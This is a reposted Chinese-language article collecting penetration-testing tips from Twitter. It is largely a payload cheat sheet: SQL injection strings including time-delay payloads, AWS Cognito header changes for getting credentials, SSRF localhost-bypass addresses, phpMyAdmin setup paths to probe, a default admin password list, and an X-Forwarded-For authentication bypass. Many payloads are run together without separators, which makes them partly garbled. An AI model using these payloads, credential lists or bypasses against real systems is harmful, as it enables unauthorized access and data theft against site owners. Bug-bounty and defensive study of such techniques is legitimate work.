干货 | Twitter渗透技巧搬运工(一)
2022-5-31 09:42:31 Author: mp.weixin.qq.com(查看原文) 阅读量:34 收藏

快速检测有无SQL注入

' OR 1=1--' OR 1=0--%27%20or%201=1*(|(object=*)))%20or%20('x'='x%20or%201=11) or pg_sleep(__TIME__)--/**/or/**/1/**/=1' or username like '%);waitfor delay '0:0:__TIME__'--or isNULL(1/0) /*x' or 1=1 or 'x'='y

来源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

AWS Cognito 配置错误

X-AMZ-TargetAWSCognitoIdentityProviderService.ConfirmSignUpX-AMZ-TargetAWSCognitoIdentityProviderService.GetUser获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应X-AMZ-TARGETAWSCognitoIdentityService.GetCredentialsForIdentity

来源:

https://threadreaderapp.com/thread/1522086964262051841.html

SSRF Bypass技巧

SSRF Bypasses
http://0.0.0.0http://0http://0x7f000001http://2130706433http://0000::1http://0000::1:25http://0000::1:22http://0000::1:3128http://2130706433http://3232235521http://3232235777http://2852039166http://0o177.0.0.1

来源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

PHPMyadmin渗透技巧

当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径
admin/phpMyAdmin/setup/index.phpphpMyAdmin/main.phpphpmyadmin/pma/Admin/setup/index.phpphpmyadmin/admin/setup/index.phpphpmyadmin/setup/phpmyadmin/setup/index.php

来源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q

找到管理员登录口,可以尝试以下账号密码

admin:adminadmin:aadmin:12346578test:testguest:guestanonymous:anonymousadmin:passwordadmin:root:toorroot:passw0rdroot:rootguest:test$sub_name:passwordADMIN:ADMINAdmin:Admin:a:a

来源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA

漏洞挖掘小技巧-身份绕过小技巧,修改XFF头

Authentication bypass.... 
Using custom header (See attached screenshot):
X-Forwarded-For: 127.0.0.1

来源:https://twitter.com/BountyOverflow/status/1523264249442627590?s=20&t=aInLegLknUcam2qSjbt2PA

文章来源:Hack学习呀

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650540311&idx=3&sn=7fb3ec7a9923a1d0ec788efe6c734f0f&chksm=83bd6cf3b4cae5e52cc57eaa546447b82fb0c9f1f4e9bbf228e80d517d4b005efb1df0a98ce3#rd
如有侵权请联系:admin#unsafe.sh